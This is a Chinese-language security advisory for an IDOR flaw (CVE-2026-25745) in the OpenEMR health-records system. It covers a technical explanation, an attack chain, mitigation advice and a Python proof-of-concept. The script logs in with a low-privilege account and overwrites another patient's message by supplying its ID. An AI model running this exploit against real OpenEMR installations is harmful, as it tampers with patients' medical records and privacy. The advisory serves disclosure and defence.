OpenEMR <= 8.0.0 IDOR漏洞可导致患者消息被非法篡改

漏洞信息

漏洞编号

CVE-2026-25745

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenEMR

漏洞概述

OpenEMR是一款免费开源的电子健康记录（EHR）和医疗实践管理应用程序，广泛应用于医疗机构进行患者信息管理和医疗流程自动化。该应用在版本8.0.0及以前存在一个严重的安全漏洞，漏洞位于消息/笔记更新功能端点。由于程序在处理更新请求时，仅根据消息ID进行操作，而未验证该消息是否属于当前登录用户所属的患者，或者用户是否具有编辑该患者笔记的权限，导致任何获得认证且拥有笔记权限的低权限用户，可以通过修改请求中的消息ID，非法访问和篡改其他患者的敏感医疗信息。此漏洞属于典型的IDOR（Insecure Direct Object Reference）类型安全缺陷，攻击者无需特殊权限即可利用，对患者隐私数据完整性造成严重威胁。

技术细节

漏洞根源在于OpenEMR的消息更新API端点（如PUT或POST方法）在处理用户请求时，直接使用客户端提供的消息ID进行数据库操作，而缺少必要的业务逻辑验证。具体流程如下：1) 攻击者首先使用合法账号登录系统，该账号只需具备基本的笔记权限；2) 系统正常获取当前患者A的消息列表；3) 攻击者通过API请求修改患者B的消息记录，方法是将请求中的message_id参数替换为患者B的消息ID；4) 服务器端未验证message_id与当前会话用户/患者的从属关系，直接执行更新操作；5) 患者B的消息内容被成功篡改。漏洞利用的关键在于API缺少对象级别的访问控制检查，攻击者通过猜测或枚举其他患者的消息ID即可实施攻击。此漏洞可能导致的危害包括：篡改患者病历信息、删除重要医疗记录、伪造医嘱内容等，对医疗安全构成严重威胁。

攻击链分析

STEP 1

信息收集

攻击者首先注册或获取一个具有笔记权限的OpenEMR低权限账号，同时收集目标患者的消息ID（可通过枚举或信息泄露获取）

STEP 2

认证登录

使用低权限账号登录OpenEMR系统，建立经过身份验证的会话

STEP 3

构造恶意请求

攻击者构造一个更新请求，将目标消息ID（不属于当前用户所属患者）作为参数，同时填充恶意内容

STEP 4

发送漏洞利用请求

通过PUT或POST方法向消息更新端点发送请求，服务器端因缺少对象所有权验证而直接处理请求

STEP 5

完成攻击

目标患者的消息记录被成功篡改，攻击者获得非法修改医疗数据的权限，可能导致医疗信息完整性破坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-25745 PoC - OpenEMR IDOR Vulnerability
# Target: OpenEMR <= 8.0.0
# Vulnerability: Insecure Direct Object Reference in message/note update endpoint

TARGET_URL = "http://target-openemr.local"  # Replace with actual target
LOGIN_URL = f"{TARGET_URL}/interface/main/main.php"
MESSAGE_UPDATE_URL = f"{TARGET_URL}/interface/patient_file/summary/add_mailbox.php"

# Authentication credentials
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def login(session, username, password):
    """Authenticate to OpenEMR"""
    login_data = {
        "authToken": "",
        "authDomain": "",
        "username": username,
        "password": password,
        "redirect": "/interface/main/main.php",
        "auth": "standard"
    }
    response = session.post(LOGIN_URL, data=login_data)
    return response.status_code == 200

def exploit_idor(session, target_message_id, malicious_content):
    """
    Exploit the IDOR vulnerability by updating another patient's message
    
    Args:
        session: Authenticated requests session
        target_message_id: ID of the target patient's message to modify
        malicious_content: New content to inject
    
    Returns:
        Response from the server
    """
    # Malicious request - no validation of message ownership
    update_data = {
        "form_id": target_message_id,  # Arbitrary message ID from other patient
        "form_note": malicious_content,
        "form_activity": "1",
        "mode": "save"
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }
    
    response = session.post(MESSAGE_UPDATE_URL, data=update_data, headers=headers)
    return response

def main():
    session = requests.Session()
    
    # Step 1: Login with low-privilege account
    print("[*] Logging in to OpenEMR...")
    if not login(session, USERNAME, PASSWORD):
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    
    # Step 2: Exploit IDOR - modify another patient's message
    # Target message ID can be enumerated or guessed
    target_msg_id = 12345  # Replace with actual target message ID
    injected_content = "MALICIOUS_MODIFIED_CONTENT"
    
    print(f"[*] Attempting to modify message ID: {target_msg_id}")
    response = exploit_idor(session, target_msg_id, injected_content)
    
    if response.status_code == 200:
        print("[+] IDOR exploit successful - message modified without ownership check")
    else:
        print(f"[-] Exploit failed with status: {response.status_code}")

if __name__ == "__main__":
    main()

影响范围

OpenEMR <= 8.0.0

防御指南

临时缓解措施

如果无法立即升级，可通过以下措施临时缓解：1) 限制笔记功能的权限分配，仅授予必要人员；2) 在Web应用防火墙（WAF）层面添加请求特征检测规则；3) 监控异常的消息访问和修改模式；4) 定期审查系统日志，排查潜在的IDOR攻击行为。建议尽快升级到官方修复版本以根本解决此漏洞。